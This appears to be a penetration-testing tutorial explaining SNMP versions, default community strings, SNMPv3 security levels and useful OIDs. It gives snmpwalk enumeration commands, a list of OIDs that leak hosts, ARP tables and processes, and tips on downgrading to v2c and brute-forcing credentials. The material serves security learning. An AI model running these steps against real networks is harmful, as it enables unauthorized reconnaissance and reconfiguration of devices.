SNMP Versions Explained
SNMP has three main versions:
| Version | Security Level | Description |
|---|---|---|
| v1 | 🟥 Insecure | Basic functionality, all data in plaintext, weak structure |
| v2c | 🟥 Insecure | Improved performance over v1, but still plaintext, uses community strings |
| v3 | ✅ Secure | Supports authentication, encryption, and user-based access |
SNMP v1 and v2c
- These use community strings as simple shared passwords.
- They have no encryption — data is visible in plaintext over the wire.
- All access is read or write, based on the string you provide.
Community strings:
| String | Access Type | Default Value |
|---|---|---|
public | Read-only | Default everywhere |
private | Read-write | Often left as-is |
✅ If a device accepts public, you can read values.
🔥 If a device accepts private, you can change settings, disable interfaces, or worse.
Note: Many SNMP services still support both
publicandprivateas defaults — and admins often forget to change or disable them.
SNMP v3
SNMPv3 was introduced to fix all the security issues of v1 and v2c.
Instead of community strings, SNMPv3 uses:
- User-based access (with usernames and passwords)
- Optional encryption and authentication (based on security level)
- Three security levels:
| Level | Name | Description |
|---|---|---|
noAuthNoPriv | No Auth, No Encryption (like v2c) | |
authNoPriv | Auth only (uses a password) | |
authPriv | Auth + Encryption (most secure) |
SNMPv3 example:
snmpwalk -v3 -u snmpuser -a SHA -A password123 -x AES -X encryptkey -l authPriv 192.168.1.1
For a pentester, SNMPv3 is usually a dead end unless:
- You brute-force the username and password
- You downgrade to v2c (if it’s still enabled)
Summary: SNMP Access Controls
| Version | Access Mechanism | Security | Pentester Feasibility |
|---|---|---|---|
| v1 | public, private | None | Very high |
| v2c | public, private | None | Very high |
| v3 | Users/passwords | Strong | Low (unless creds leak) |
What is an OID (Object Identifier)?
Think of the MIB as a database — and OIDs are the keys.
Every piece of SNMP-exposed information has a unique OID, like:
1.3.6.1.2.1.1.5.0 → sysName (hostname)
The full OID path is like navigating a file system or JSON tree.
Here’s a simplified view:
1 – iso
3 – org
6 – dod
1 – internet
2 – mgmt
1 – mib-2
1 – system
5 – sysName
That’s how we get:
1.3.6.1.2.1.1.5.0 = sysName (hostname)
Common High-Value OIDs for Pentesters
| OID | Info Leaked |
|---|---|
1.3.6.1.2.1.1.5.0 | Hostname (sysName) |
1.3.6.1.2.1.1.3.0 | Uptime (sysUpTime) |
1.3.6.1.2.1.25.1.6.0 | Number of logged in users |
1.3.6.1.2.1.4.20.1.1 | IP addresses on interfaces |
1.3.6.1.2.1.4.22.1.2 | ARP table (internal network discovery) |
1.3.6.1.2.1.25.4.2.1.2 | Running processes |
1.3.6.1.2.1.25.6.3.1.2 | Installed software |
1.3.6.1.2.1.2.2.1.2 | Interface names |
What to Do If You Find SNMP v3
- Check for fallback support:
Some systems run both SNMPv3 and v2c. Try:snmpwalk -v2c -c public 192.168.1.1 - Brute-force v3 credentials (rarely practical):
Tools likesnmpenum,onesixtyone, andsnmp-checkcan sometimes help. - Sniff SNMPv3 traffic:
If misconfigured to usenoAuthNoPriv, v3 still leaks data in plaintext.
Final Summary
- SNMPv1/v2c use
publicandprivatestrings, no encryption — perfect for passive enumeration - SNMPv3 replaces this with usernames, authentication, and optional encryption
- Community strings are like shared passwords. If you find
private, you’re in control. - OIDs are how you ask for specific data — learn the useful ones and use them with
snmpwalk,snmpget, andsnmpset